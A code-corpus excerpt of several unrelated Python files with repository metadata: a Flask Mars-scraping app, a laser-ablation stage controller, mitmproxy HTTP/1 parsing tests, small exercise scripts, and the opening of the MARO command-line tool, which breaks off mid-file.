ddef4f42f74d72793796ca96d532e4f8c49f4525
|
[
"ADSL"
] | null | null | null |
Missions_to_Mars/app.py
|
alienor1/web-scraping-challenge
|
ddef4f42f74d72793796ca96d532e4f8c49f4525
|
[
"ADSL"
] | null | null | null |
Missions_to_Mars/app.py
|
alienor1/web-scraping-challenge
|
ddef4f42f74d72793796ca96d532e4f8c49f4525
|
[
"ADSL"
] | null | null | null |
from flask import Flask, render_template, redirect
from flask_pymongo import PyMongo
import scrape_mars
app = Flask(__name__)
mongo = PyMongo(app, uri="mongodb://localhost:27017/mars_application")
@app.route("/")
def home():
# Find one record of data from the mongo database
mars_data = mongo.db.collection.find_one()
#make auto generated table a bootstrap style table
mars_data["Mars_Table"]=mars_data["Mars_Table"].replace('<table border="1" class="dataframe">',"<table class='table table-sm'>")
print("--- MONGO DATA ---")
print(mars_data)
print("--- END MONGO DATA ---")
# Return template and data
return render_template("index.html", mission_mars=mars_data)
# Route that will trigger the scrape function
@app.route("/scrape")
def scrape():
# Run the scrape function in Python File
mars_data = scrape_mars.scrape()
mongo.db.collection.update({}, mars_data, upsert=True)
# Redirect back to index/home page
return redirect("/", 302)
if __name__ == "__main__":
app.run(debug=True)
| 27.230769
| 132
| 0.694915
|
5f343bb1889f1dc7e0c5bf1349650ef913c53e47
| 9,524
|
py
|
Python
|
pychron/lasers/laser_managers/ablation_laser_manager.py
|
ael-noblegas/pychron
|
6ebbbb1f66a614972b62b7a9be4c784ae61b5d62
|
[
"Apache-2.0"
] | null | null | null |
pychron/lasers/laser_managers/ablation_laser_manager.py
|
ael-noblegas/pychron
|
6ebbbb1f66a614972b62b7a9be4c784ae61b5d62
|
[
"Apache-2.0"
] | 27
|
2019-10-07T17:43:35.000Z
|
2021-12-05T21:25:07.000Z
|
pychron/lasers/laser_managers/ablation_laser_manager.py
|
ael-noblegas/pychron
|
6ebbbb1f66a614972b62b7a9be4c784ae61b5d62
|
[
"Apache-2.0"
] | null | null | null |
# ===============================================================================
# Copyright 2015 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
# ============= standard library imports ========================
import time
# ============= local library imports ==========================
from pychron.core.helpers.strtools import csv_to_floats
from pychron.lasers.laser_managers.serial_laser_manager import SerialLaserManager
class ReadPositionError(BaseException):
def __init__(self, xyz):
self._msg = 'ReadPosition error. Laser responded={}'.format(xyz)
def __str__(self):
return self._msg
def __repr__(self):
return self._msg
class AblationCO2Manager(SerialLaserManager):
stage_manager_id = 'ablation.pychron'
configuration_dir_name = 'ablation'
read_delay = 25
def set_tray(self, t):
if self.stage_manager:
self.stage_manager.stage_map_name = t
def _test_connection_hook(self):
i = 0
n = 3
while 1:
re = self._ask('GetVersion')
if re:
self.connected = True
return
elif i > n:
self.connected = False
return
time.sleep(1)
i += 1
def end_extract(self, *args, **kw):
self.info('ending extraction. set laser power to 0')
self.set_laser_power(0)
if self._patterning:
self.stop_pattern()
self.disable_laser()
def fire_laser(self):
self.info('fire laser')
self._ask('SetLaserOn 1')
def extract(self, value, units=None, tol=0.1, fire_laser=True, **kw):
if units is None:
units = 'watts'
self.info('set laser output to {} {}'.format(value, units))
if units == 'watts':
ovalue = value
value = self.calculate_calibrated_power(value)
if value < 0:
self.warning('Consider changing you calibration curve. '
'{} watts converted to {}%. % must be positive'.format(ovalue, value))
value = 0
resp = self.set_laser_power(value)
if fire_laser:
time.sleep(1)
self.fire_laser()
try:
return abs(float(resp) - value) < tol
except BaseException:
pass
def set_laser_power(self, v):
self.debug('setting laser output to {}'.format(v))
return self._ask('SetLaserOutput {}'.format(v))
def enable_laser(self, **kw):
# self._ask('laser.enable ON')
self.info('enabling laser')
self._ask('SetLaserFireMode 3') # 3= continuous wave
# self._ask('SetLaserOn 1')
self.enabled = True
def disable_laser(self):
self.info('disabling laser')
self.set_laser_power(0)
self._ask('SetLaserOn 0')
self.enabled = False
def get_position(self, retry=True):
x, y, z = self._x, self._y, self._z
xyz = self._ask('ReadPosition')
if xyz:
try:
x, y, z = [float(v) for v in xyz.split(',')]
if self.stage_manager.use_sign_position_correction:
x = x * self.stage_manager.x_sign
y = y * self.stage_manager.y_sign
z = z * self.stage_manager.z_sign
except ValueError:
self.warning('failed parsing position: {}'.format(xyz))
if retry:
time.sleep(0.5)
x, y, z = self.get_position(retry=False)
else:
raise ReadPositionError(xyz)
return x, y, z
def _ask(self, cmd, retry=3):
resp = super(AblationCO2Manager, self)._ask(cmd)
if not resp or (resp and resp.strip().startswith('ERROR')):
if retry:
resp = self._ask(cmd, retry-1)
return resp
def linear_move(self, x, y, block=False, *args, **kw):
self._move_to_position((x, y), block=block)
def stop(self):
self.warning_dialog('The Laser Ablation software does not allow remote stopping of the laser motion')
# self._ask('stage.stop')
# self._is_moving = False
# self.update_position()
# private
def _stage_stop_button_fired(self):
self.stop()
def _fire_laser_button_fired(self):
# if self._firing:
# cmd = 0
# else:
# cmd = 1
self._firing = not self._firing
self._ask('SetLaserOn {}'.format(int(self._firing)))
def _output_power_changed(self, new):
self.extract(new, self.units, fire_laser=False)
def _set_x(self, v):
if self._move_enabled and v != self._x:
self._is_moving = True
self._ask('SetPosition {:0.3f},{:0.3f},{:0.3f}'.format(v, self._y, self._z))
self._single_axis_moving(v, 0)
def _set_y(self, v):
if self._move_enabled and v != self._y:
self._is_moving = True
self._ask('SetPosition {:0.3f},{:0.3f},{:0.3f}'.format(self._x, v, self._z))
self._single_axis_moving(v, 1)
def _set_z(self, v):
if self._move_enabled and v != self._z:
self._is_moving = True
self._ask('SetPosition {:0.3f},{:0.3f},{:0.3f}'.format(self._x, self._y, v))
self._single_axis_moving(v, 2)
def _single_axis_moving(self, v, axis):
def cmpfunc(xyz):
try:
if not self._is_moving:
return True
# pos =[float(p) for p in xyz.split(','))[axis]
pos = float(xyz.split(',')[axis])
return abs(pos - v) > 2
# print map(lambda ab: abs(ab[0] - ab[1]) <= 2,
# zip(map(float, xyz.split(',')),
# (xm, ym, zm)))
# return not all(map(lambda ab: abs(ab[0] - ab[1]) <= 2,
# zip(map(float, xyz.split(',')),
# (xm, ym, zm))))
except ValueError as e:
print('_moving exception {}'.format(e))
self._block(cmd='ReadPosition', cmpfunc=cmpfunc)
time.sleep(0.25)
self._is_moving = False
self.update_position()
def _move_to_position(self, pos, autocenter=False, block=True, *args, **kw):
sm = self.stage_manager
try:
x, y = self._get_hole_xy(pos)
except ValueError:
return
z = self._z
# xs = 5000
# ys = 5000
# zs = 100
self._is_moving = True
self.debug('pos={}, x={}, y={}'.format(pos, x, y))
if sm.use_sign_position_correction:
x *= sm.x_sign
y *= sm.y_sign
z *= sm.z_sign
cmd = 'SetPosition {:0.3f},{:0.3f},{:0.3f}'.format(x, y, z)
self.info('sending {}'.format(cmd))
self._ask(cmd)
time.sleep(1)
return self._moving(x, y, z, block)
def _moving(self, xm, ym, zm, block=True):
r = True
if block:
time.sleep(0.5)
def cmpfunc(xyz):
try:
if not self._is_moving:
return True
# ps = [float(p) for p in xyz.split(',')]
ps = csv_to_floats(xyz)
# return not all([abs(ab[0] - ab[1]) <= 2 for ab in zip(list(map(float, xyz.split(','))),
# (xm, ym, zm))])
return not all(abs(a - b) <= 0.01 for a, b in zip(ps, (xm, ym, zm)))
except ValueError as e:
print('_moving exception {}'.format(e))
r = self._block(cmd='ReadPosition', cmpfunc=cmpfunc, period=1)
self._is_moving = False
time.sleep(0.5)
self.update_position()
return r
def _stage_manager_default(self):
name = 'ablation'
args = dict(name='stage',
configuration_name='stage',
configuration_dir_name=name,
parent=self)
return self._stage_manager_factory(args)
def _stage_manager_factory(self, args):
from pychron.lasers.stage_managers.ablation_stage_manager import AblationStageManager
self.stage_args = args
klass = AblationStageManager
sm = klass(**args)
sm.id = self.stage_manager_id
return sm
def _pattern_executor_default(self):
from pychron.lasers.pattern.pattern_executor import PatternExecutor
pm = PatternExecutor(application=self.application,
controller=self,
laser_manager=self)
return pm
# ============= EOF =============================================
| 32.728522
| 109
| 0.526564
|
9746c1e1dd3382fc89bad8d20d4fce321defbf2c
| 11,941
|
py
|
Python
|
test/mitmproxy/net/http/http1/test_read.py
|
cifred98/mitmproxy
|
59fd15ef12c7eba4f44c5ad91171ccc8eb12e50b
|
[
"MIT"
] | 3
|
2021-12-25T02:29:24.000Z
|
2022-02-22T02:12:30.000Z
|
test/mitmproxy/net/http/http1/test_read.py
|
cifred98/mitmproxy
|
59fd15ef12c7eba4f44c5ad91171ccc8eb12e50b
|
[
"MIT"
] | null | null | null |
test/mitmproxy/net/http/http1/test_read.py
|
cifred98/mitmproxy
|
59fd15ef12c7eba4f44c5ad91171ccc8eb12e50b
|
[
"MIT"
] | 1
|
2022-02-01T07:12:57.000Z
|
2022-02-01T07:12:57.000Z
|
from io import BytesIO
from unittest.mock import Mock
import pytest
from mitmproxy import exceptions
from mitmproxy.net.http import Headers
from mitmproxy.net.http.http1.read import (
read_request, read_response, read_request_head,
read_response_head, read_body, connection_close, expected_http_body_size, _get_first_line,
_read_request_line, _read_response_line, _check_http_version,
_read_headers, _read_chunked, get_header_tokens
)
from mitmproxy.test.tutils import treq, tresp
def test_get_header_tokens():
headers = Headers()
assert get_header_tokens(headers, "foo") == []
headers["foo"] = "bar"
assert get_header_tokens(headers, "foo") == ["bar"]
headers["foo"] = "bar, voing"
assert get_header_tokens(headers, "foo") == ["bar", "voing"]
headers.set_all("foo", ["bar, voing", "oink"])
assert get_header_tokens(headers, "foo") == ["bar", "voing", "oink"]
@pytest.mark.parametrize("input", [
b"GET / HTTP/1.1\r\n\r\nskip",
b"GET / HTTP/1.1\r\n\r\nskip",
b"GET / HTTP/1.1\r\n\r\nskip",
b"GET / HTTP/1.1 \r\n\r\nskip",
])
def test_read_request(input):
rfile = BytesIO(input)
r = read_request(rfile)
assert r.method == "GET"
assert r.content == b""
assert r.http_version == "HTTP/1.1"
assert r.timestamp_end
assert rfile.read() == b"skip"
@pytest.mark.parametrize("input", [
b"CONNECT :0 0",
])
def test_read_request_error(input):
rfile = BytesIO(input)
with pytest.raises(exceptions.HttpException):
read_request(rfile)
def test_read_request_head():
rfile = BytesIO(
b"GET / HTTP/1.1\r\n"
b"Content-Length: 4\r\n"
b"\r\n"
b"skip"
)
rfile.reset_timestamps = Mock()
rfile.first_byte_timestamp = 42
r = read_request_head(rfile)
assert r.method == "GET"
assert r.headers["Content-Length"] == "4"
assert r.content is None
assert rfile.reset_timestamps.called
assert r.timestamp_start == 42
assert rfile.read() == b"skip"
@pytest.mark.parametrize("input", [
b"HTTP/1.1 418 I'm a teapot\r\n\r\nbody",
b"HTTP/1.1 418 I'm a teapot\r\n\r\nbody",
b"HTTP/1.1 418 I'm a teapot\r\n\r\nbody",
b"HTTP/1.1 418 I'm a teapot \r\n\r\nbody",
])
def test_read_response(input):
req = treq()
rfile = BytesIO(input)
r = read_response(rfile, req)
assert r.http_version == "HTTP/1.1"
assert r.status_code == 418
assert r.reason == "I'm a teapot"
assert r.content == b"body"
assert r.timestamp_end
def test_read_response_head():
rfile = BytesIO(
b"HTTP/1.1 418 I'm a teapot\r\n"
b"Content-Length: 4\r\n"
b"\r\n"
b"skip"
)
rfile.reset_timestamps = Mock()
rfile.first_byte_timestamp = 42
r = read_response_head(rfile)
assert r.status_code == 418
assert r.headers["Content-Length"] == "4"
assert r.content is None
assert rfile.reset_timestamps.called
assert r.timestamp_start == 42
assert rfile.read() == b"skip"
class TestReadBody:
def test_chunked(self):
rfile = BytesIO(b"3\r\nfoo\r\n0\r\n\r\nbar")
body = b"".join(read_body(rfile, None))
assert body == b"foo"
assert rfile.read() == b"bar"
def test_known_size(self):
rfile = BytesIO(b"foobar")
body = b"".join(read_body(rfile, 3))
assert body == b"foo"
assert rfile.read() == b"bar"
def test_known_size_limit(self):
rfile = BytesIO(b"foobar")
with pytest.raises(exceptions.HttpException):
b"".join(read_body(rfile, 3, 2))
def test_known_size_too_short(self):
rfile = BytesIO(b"foo")
with pytest.raises(exceptions.HttpException):
b"".join(read_body(rfile, 6))
def test_unknown_size(self):
rfile = BytesIO(b"foobar")
body = b"".join(read_body(rfile, -1))
assert body == b"foobar"
def test_unknown_size_limit(self):
rfile = BytesIO(b"foobar")
with pytest.raises(exceptions.HttpException):
b"".join(read_body(rfile, -1, 3))
def test_max_chunk_size(self):
rfile = BytesIO(b"123456")
assert list(read_body(rfile, -1, max_chunk_size=None)) == [b"123456"]
rfile = BytesIO(b"123456")
assert list(read_body(rfile, -1, max_chunk_size=1)) == [b"1", b"2", b"3", b"4", b"5", b"6"]
def test_connection_close():
headers = Headers()
assert connection_close(b"HTTP/1.0", headers)
assert not connection_close(b"HTTP/1.1", headers)
headers["connection"] = "keep-alive"
assert not connection_close(b"HTTP/1.1", headers)
headers["connection"] = "close"
assert connection_close(b"HTTP/1.1", headers)
headers["connection"] = "foobar"
assert connection_close(b"HTTP/1.0", headers)
assert not connection_close(b"HTTP/1.1", headers)
def test_expected_http_body_size():
# Expect: 100-continue
assert expected_http_body_size(
treq(headers=Headers(expect="100-continue", content_length="42")),
expect_continue_as_0=True
) == 0
# Expect: 100-continue
assert expected_http_body_size(
treq(headers=Headers(expect="100-continue", content_length="42")),
expect_continue_as_0=False
) == 42
# http://tools.ietf.org/html/rfc7230#section-3.3
assert expected_http_body_size(
treq(method=b"HEAD"),
tresp(headers=Headers(content_length="42"))
) == 0
assert expected_http_body_size(
treq(method=b"CONNECT"),
tresp()
) == 0
for code in (100, 204, 304):
assert expected_http_body_size(
treq(),
tresp(status_code=code)
) == 0
# chunked
assert expected_http_body_size(
treq(headers=Headers(transfer_encoding="chunked")),
) is None
# explicit length
for val in (b"foo", b"-7"):
with pytest.raises(exceptions.HttpSyntaxException):
expected_http_body_size(
treq(headers=Headers(content_length=val))
)
assert expected_http_body_size(
treq(headers=Headers(content_length="42"))
) == 42
# more than 1 content-length headers with same value
assert expected_http_body_size(
treq(headers=Headers([(b'content-length', b'42'), (b'content-length', b'42')]))
) == 42
# more than 1 content-length headers with conflicting value
with pytest.raises(exceptions.HttpSyntaxException):
expected_http_body_size(
treq(headers=Headers([(b'content-length', b'42'), (b'content-length', b'45')]))
)
# no length
assert expected_http_body_size(
treq(headers=Headers())
) == 0
assert expected_http_body_size(
treq(headers=Headers()), tresp(headers=Headers())
) == -1
def test_get_first_line():
rfile = BytesIO(b"foo\r\nbar")
assert _get_first_line(rfile) == b"foo"
rfile = BytesIO(b"\r\nfoo\r\nbar")
assert _get_first_line(rfile) == b"foo"
with pytest.raises(exceptions.HttpReadDisconnect):
rfile = BytesIO(b"")
_get_first_line(rfile)
with pytest.raises(exceptions.HttpReadDisconnect):
rfile = Mock()
rfile.readline.side_effect = exceptions.TcpDisconnect
_get_first_line(rfile)
def test_read_request_line():
def t(b):
return _read_request_line(BytesIO(b))
assert (t(b"GET / HTTP/1.1") ==
("", 0, b"GET", b"", b"", b"/", b"HTTP/1.1"))
assert (t(b"OPTIONS * HTTP/1.1") ==
("", 0, b"OPTIONS", b"", b"", b"*", b"HTTP/1.1"))
assert (t(b"CONNECT foo:42 HTTP/1.1") ==
("foo", 42, b"CONNECT", b"", b"foo:42", b"", b"HTTP/1.1"))
assert (t(b"GET http://foo:42/bar HTTP/1.1") ==
("foo", 42, b"GET", b"http", b"foo:42", b"/bar", b"HTTP/1.1"))
with pytest.raises(exceptions.HttpSyntaxException):
t(b"GET / WTF/1.1")
with pytest.raises(exceptions.HttpSyntaxException):
t(b"CONNECT example.com HTTP/1.1") # port missing
with pytest.raises(exceptions.HttpSyntaxException):
t(b"GET ws://example.com/ HTTP/1.1") # port missing
with pytest.raises(exceptions.HttpSyntaxException):
t(b"this is not http")
with pytest.raises(exceptions.HttpReadDisconnect):
t(b"")
def test_read_response_line():
def t(b):
return _read_response_line(BytesIO(b))
assert t(b"HTTP/1.1 200 OK") == (b"HTTP/1.1", 200, b"OK")
assert t(b"HTTP/1.1 200") == (b"HTTP/1.1", 200, b"")
# https://github.com/mitmproxy/mitmproxy/issues/784
assert t(b"HTTP/1.1 200 Non-Autoris\xc3\xa9") == (b"HTTP/1.1", 200, b"Non-Autoris\xc3\xa9")
with pytest.raises(exceptions.HttpSyntaxException):
assert t(b"HTTP/1.1")
with pytest.raises(exceptions.HttpSyntaxException):
t(b"HTTP/1.1 OK OK")
with pytest.raises(exceptions.HttpSyntaxException):
t(b"WTF/1.1 200 OK")
with pytest.raises(exceptions.HttpReadDisconnect):
t(b"")
def test_check_http_version():
_check_http_version(b"HTTP/0.9")
_check_http_version(b"HTTP/1.0")
_check_http_version(b"HTTP/1.1")
_check_http_version(b"HTTP/2.0")
with pytest.raises(exceptions.HttpSyntaxException):
_check_http_version(b"WTF/1.0")
with pytest.raises(exceptions.HttpSyntaxException):
_check_http_version(b"HTTP/1.10")
with pytest.raises(exceptions.HttpSyntaxException):
_check_http_version(b"HTTP/1.b")
class TestReadHeaders:
@staticmethod
def _read(data):
return _read_headers(BytesIO(data))
def test_read_simple(self):
data = (
b"Header: one\r\n"
b"Header2: two\r\n"
b"\r\n"
)
headers = self._read(data)
assert headers.fields == ((b"Header", b"one"), (b"Header2", b"two"))
def test_read_multi(self):
data = (
b"Header: one\r\n"
b"Header: two\r\n"
b"\r\n"
)
headers = self._read(data)
assert headers.fields == ((b"Header", b"one"), (b"Header", b"two"))
def test_read_continued(self):
data = (
b"Header: one\r\n"
b"\ttwo\r\n"
b"Header2: three\r\n"
b"\r\n"
)
headers = self._read(data)
assert headers.fields == ((b"Header", b"one\r\n two"), (b"Header2", b"three"))
def test_read_continued_err(self):
data = b"\tfoo: bar\r\n"
with pytest.raises(exceptions.HttpSyntaxException):
self._read(data)
def test_read_err(self):
data = b"foo"
with pytest.raises(exceptions.HttpSyntaxException):
self._read(data)
def test_read_empty_name(self):
data = b":foo"
with pytest.raises(exceptions.HttpSyntaxException):
self._read(data)
def test_read_empty_value(self):
data = b"bar:"
headers = self._read(data)
assert headers.fields == ((b"bar", b""),)
def test_read_chunked():
req = treq(content=None)
req.headers["Transfer-Encoding"] = "chunked"
data = b"1\r\na\r\n0\r\n"
with pytest.raises(exceptions.HttpSyntaxException):
b"".join(_read_chunked(BytesIO(data)))
data = b"1\r\na\r\n0\r\n\r\n"
assert b"".join(_read_chunked(BytesIO(data))) == b"a"
data = b"\r\n\r\n1\r\na\r\n1\r\nb\r\n0\r\n\r\n"
assert b"".join(_read_chunked(BytesIO(data))) == b"ab"
data = b"\r\n"
with pytest.raises(Exception, match="closed prematurely"):
b"".join(_read_chunked(BytesIO(data)))
data = b"1\r\nfoo"
with pytest.raises(Exception, match="Malformed chunked body"):
b"".join(_read_chunked(BytesIO(data)))
data = b"foo\r\nfoo"
with pytest.raises(exceptions.HttpSyntaxException):
b"".join(_read_chunked(BytesIO(data)))
data = b"5\r\naaaaa\r\n0\r\n\r\n"
with pytest.raises(Exception, match="too large"):
b"".join(_read_chunked(BytesIO(data), limit=2))
| 31.259162
| 99
| 0.621891
|
0127bac68bf223b1e5be6bd1bf11a7358abb9f96
| 138
|
py
|
Python
|
code2/day09/demo02.py
|
picktsh/python
|
0f758dcdf9eee3580d8f6e2241ef557b6320ef54
|
[
"MIT"
] | 1
|
2019-12-31T16:44:06.000Z
|
2019-12-31T16:44:06.000Z
|
code2/day09/demo02.py
|
picktsh/python
|
0f758dcdf9eee3580d8f6e2241ef557b6320ef54
|
[
"MIT"
] | null | null | null |
code2/day09/demo02.py
|
picktsh/python
|
0f758dcdf9eee3580d8f6e2241ef557b6320ef54
|
[
"MIT"
] | 1
|
2022-01-13T10:32:22.000Z
|
2022-01-13T10:32:22.000Z
|
# 本地Chrome浏览器设置方法
from selenium import webdriver # 从selenium库中调用webdriver模块
driver = webdriver.Chrome() # 设置引擎为Chrome,真实地打开一个Chrome浏览器
| 27.6
| 59
| 0.826087
|
f333190780725382970e6c630284406a7c286879
| 749
|
py
|
Python
|
solution/4963(섬의 개수).py
|
OMEGA-Y/Baekjoon-sol
|
9eaa441e482a0967fb60a9ea1d1373be00272c34
|
[
"Apache-2.0"
] | null | null | null |
solution/4963(섬의 개수).py
|
OMEGA-Y/Baekjoon-sol
|
9eaa441e482a0967fb60a9ea1d1373be00272c34
|
[
"Apache-2.0"
] | null | null | null |
solution/4963(섬의 개수).py
|
OMEGA-Y/Baekjoon-sol
|
9eaa441e482a0967fb60a9ea1d1373be00272c34
|
[
"Apache-2.0"
] | null | null | null |
import sys
input = sys.stdin.readline
sys.setrecursionlimit(10**6)
def dfs(matrix, n, m, count, x, y):
matrix[x][y] = 0
dx = [-1,1,0,0,-1,-1,1,1]
dy = [0,0,-1,1,-1,1,-1,1]
for i in range(8):
nx = x+dx[i]
ny = y+dy[i]
if nx >= 0 and nx < m and ny >= 0 and ny < n:
if matrix[nx][ny] == 1:
count = dfs(matrix, n, m, count+1, nx, ny)
return count
while True:
n,m = map(int,input().split())
if n == 0:
break
matrix = [list(map(int,input().rstrip().split())) for _ in range(m)]
cnt = 0
for i in range(m):
for j in range(n):
if matrix[i][j] == 1:
dfs(matrix, n, m, 1, i, j)
cnt += 1
print(cnt)
| 22.69697
| 72
| 0.460614
|
d4b8aabd6c6ffe4d18bf15321ab26ad80f1e4da0
| 39,041
|
py
|
Python
|
maro/cli/maro.py
|
yangboz/maro
|
0973783e55ca07bf8e177910c9d47854117a4ea8
|
[
"MIT"
] | 598
|
2020-09-23T00:50:22.000Z
|
2022-03-31T08:12:54.000Z
|
maro/cli/maro.py
|
gx9702/maro
|
38c796f0a7ed1e0f64c299d96c6e0df032401fa9
|
[
"MIT"
] | 235
|
2020-09-22T10:20:48.000Z
|
2022-03-31T02:10:03.000Z
|
maro/cli/maro.py
|
gx9702/maro
|
38c796f0a7ed1e0f64c299d96c6e0df032401fa9
|
[
"MIT"
] | 116
|
2020-09-22T09:19:04.000Z
|
2022-02-12T05:04:07.000Z
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import logging
import traceback
from argparse import Namespace
from copy import deepcopy
import maro.cli.utils.examples as CliExamples
from maro import __version__
from maro.cli.utils.params import GlobalParams
from maro.cli.utils.parser import ArgumentParser
from maro.utils.exception.cli_exception import CliError, CommandNotFoundError
from maro.utils.logger import CliLogger
MARO_BANNER = """
___ __ _ ____ ___
| \/ | / \ | _ \ / _ \\
| |\/| | / _ \ | |_) | | | |
| | | |/ ___ \| _ <| |_| |
|_| |_/_/ \_\_| \_ \___/
Welcome to the MARO CLI
Use `maro --version` to get the current version.
"""
logger = CliLogger(name=__name__)
def main():
global_parser = ArgumentParser()
global_parser.add_argument("--debug", action='store_true', help="Enable debug mode")
global_parser.add_argument("-h", "--help", action='store_true', help="Show this message and exit")
parser = ArgumentParser(prog='maro', description=MARO_BANNER, parents=[global_parser])
parser.set_defaults(func=_help_func(parser=parser))
parser.add_argument('--version', action='store_true', help='Get version info')
subparsers = parser.add_subparsers()
# maro env
parser_env = subparsers.add_parser(
'env',
help=(
'Get all environment-related information, '
'such as the supported scenarios, topologies. \n'
'And it is also responsible to generate data to the specific environment, '
'which has external data dependency.'
),
parents=[global_parser]
)
parser_env.set_defaults(func=_help_func(parser=parser_env))
load_parser_env(parser_env, global_parser)
# maro data
parser_data = subparsers.add_parser(
'data',
help="Data processing tools for MARO binary format.",
parents=[global_parser]
)
parser_data.set_defaults(func=_help_func(parser=parser_data))
load_parser_data(prev_parser=parser_data, global_parser=global_parser)
# maro meta
parser_meta = subparsers.add_parser(
'meta',
help="Manage the meta files for MARO.",
parents=[global_parser]
)
parser_meta.set_defaults(func=_help_func(parser=parser_meta))
load_parser_meta(prev_parser=parser_meta, global_parser=global_parser)
# maro grass
parser_grass = subparsers.add_parser(
"grass",
help="Manage distributed cluster with native virtual machines (for development only).",
parents=[global_parser]
)
parser_grass.set_defaults(func=_help_func(parser=parser_grass))
load_parser_grass(prev_parser=parser_grass, global_parser=global_parser)
# maro k8s
parser_k8s = subparsers.add_parser(
"k8s",
help="Manage distributed cluster with Kubernetes.",
parents=[global_parser]
)
parser_k8s.set_defaults(func=_help_func(parser=parser_k8s))
load_parser_k8s(prev_parser=parser_k8s, global_parser=global_parser)
# maro inspector
parser_inspector = subparsers.add_parser(
'inspector',
help=("Display visualization of experimental data."),
parents=[global_parser]
)
parser_inspector.set_defaults(func=_help_func(parser=parser_inspector))
load_parser_inspector(parser_inspector, global_parser)
# maro process
parser_process = subparsers.add_parser(
"process",
help="Run application by mulit-process to simulate distributed mode."
)
parser_process.set_defaults(func=_help_func(parser=parser_process))
load_parser_process(prev_parser=parser_process, global_parser=global_parser)
# maro project
parser_project = subparsers.add_parser(
"project",
help="Manage maro projects."
)
parser_project.set_defaults(func=_help_func(parser=load_parser_project))
load_parser_project(prev_parser=parser_project, global_parser=global_parser)
# maro admin
parser_admin = subparsers.add_parser(
"admin",
help="Manage maro admin tools."
)
parser_admin.set_defaults(func=_help_func(parser=parser_admin))
load_parser_admin(prev_parser=parser_admin, global_parser=global_parser)
args = None
try:
# Get args and parse global arguments
args = parser.parse_args()
if args.debug:
GlobalParams.LOG_LEVEL = logging.DEBUG
else:
GlobalParams.LOG_LEVEL = logging.INFO
if args.version:
logger.info(f'{__version__}')
return
actual_args = _get_actual_args(namespace=args)
# WARNING: We cannot assign any argument like 'func' in the CLI
args.func(**actual_args)
except CommandNotFoundError as e:
logger.error_red(f"{e.__class__.__name__}: {e.get_message()}")
logger.info(f"{e.usage}")
except CliError as e:
if args is None or args.debug:
logger.error_red(f"{e.__class__.__name__}: {e.get_message()}\n{traceback.format_exc()}")
else:
logger.error_red(f"{e.__class__.__name__}: {e.get_message()}")
def load_parser_process(prev_parser: ArgumentParser, global_parser: ArgumentParser) -> None:
subparsers = prev_parser.add_subparsers()
# maro process create
from maro.cli.process.create import create
parser_setup = subparsers.add_parser(
"create",
help="Create local process environment.",
examples=CliExamples.MARO_PROCESS_SETUP,
parents=[global_parser]
)
parser_setup.add_argument(
'deployment_path',
help='Path of the local process setting deployment.',
nargs='?',
default=None)
parser_setup.set_defaults(func=create)
# maro process delete
from maro.cli.process.delete import delete
parser_setup = subparsers.add_parser(
"delete",
help="Delete the local process environment. Including closing agents and maro Redis.",
parents=[global_parser]
)
parser_setup.set_defaults(func=delete)
# maro process job
parser_job = subparsers.add_parser(
"job",
help="Manage jobs",
parents=[global_parser]
)
parser_job.set_defaults(func=_help_func(parser=parser_job))
parser_job_subparsers = parser_job.add_subparsers()
# maro process job start
from maro.cli.process.job import start_job
parser_job_start = parser_job_subparsers.add_parser(
'start',
help='Start a training job',
examples=CliExamples.MARO_PROCESS_JOB_START,
parents=[global_parser]
)
parser_job_start.add_argument(
'deployment_path', help='Path of the job deployment')
parser_job_start.set_defaults(func=start_job)
# maro process job stop
from maro.cli.process.job import stop_job
parser_job_stop = parser_job_subparsers.add_parser(
'stop',
help='Stop a training job',
examples=CliExamples.MARO_PROCESS_JOB_STOP,
parents=[global_parser]
)
parser_job_stop.add_argument(
'job_name', help='Name of the job')
parser_job_stop.set_defaults(func=stop_job)
# maro process job delete
from maro.cli.process.job import delete_job
parser_job_delete = parser_job_subparsers.add_parser(
'delete',
help='delete a stopped job',
examples=CliExamples.MARO_PROCESS_JOB_DELETE,
parents=[global_parser]
)
parser_job_delete.add_argument(
'job_name', help='Name of the job or the schedule')
parser_job_delete.set_defaults(func=delete_job)
# maro process job list
from maro.cli.process.job import list_jobs
parser_job_list = parser_job_subparsers.add_parser(
'list',
help='List all jobs',
examples=CliExamples.MARO_PROCESS_JOB_LIST,
parents=[global_parser]
)
parser_job_list.set_defaults(func=list_jobs)
# maro process job logs
from maro.cli.process.job import get_job_logs
parser_job_logs = parser_job_subparsers.add_parser(
'logs',
help='Get logs of the job',
examples=CliExamples.MARO_PROCESS_JOB_LOGS,
parents=[global_parser]
)
parser_job_logs.add_argument(
'job_name', help='Name of the job')
parser_job_logs.set_defaults(func=get_job_logs)
# maro process schedule
parser_schedule = subparsers.add_parser(
'schedule',
help='Manage schedules',
parents=[global_parser]
)
parser_schedule.set_defaults(func=_help_func(parser=parser_schedule))
parser_schedule_subparsers = parser_schedule.add_subparsers()
# maro process schedule start
from maro.cli.process.schedule import start_schedule
parser_schedule_start = parser_schedule_subparsers.add_parser(
'start',
help='Start a schedule',
examples=CliExamples.MARO_PROCESS_SCHEDULE_START,
parents=[global_parser]
)
parser_schedule_start.add_argument(
'deployment_path', help='Path of the schedule deployment')
parser_schedule_start.set_defaults(func=start_schedule)
# maro process schedule stop
from maro.cli.process.schedule import stop_schedule
parser_schedule_stop = parser_schedule_subparsers.add_parser(
'stop',
help='Stop a schedule',
examples=CliExamples.MARO_PROCESS_SCHEDULE_STOP,
parents=[global_parser]
)
parser_schedule_stop.add_argument(
'schedule_name', help='Name of the schedule')
parser_schedule_stop.set_defaults(func=stop_schedule)
# maro process template
from maro.cli.process.template import template
parser_template = subparsers.add_parser(
"template",
help="Get deployment templates",
examples=CliExamples.MARO_PROCESS_TEMPLATE,
parents=[global_parser]
)
parser_template.add_argument(
"--setting_deploy",
action="store_true",
help="Get environment setting templates"
)
parser_template.add_argument(
"export_path",
default="./",
nargs='?',
help="Path of the export directory")
parser_template.set_defaults(func=template)
def load_parser_grass(prev_parser: ArgumentParser, global_parser: ArgumentParser) -> None:
subparsers = prev_parser.add_subparsers()
# maro grass create
from maro.cli.grass.create import create
parser_create = subparsers.add_parser(
"create",
help="Create cluster",
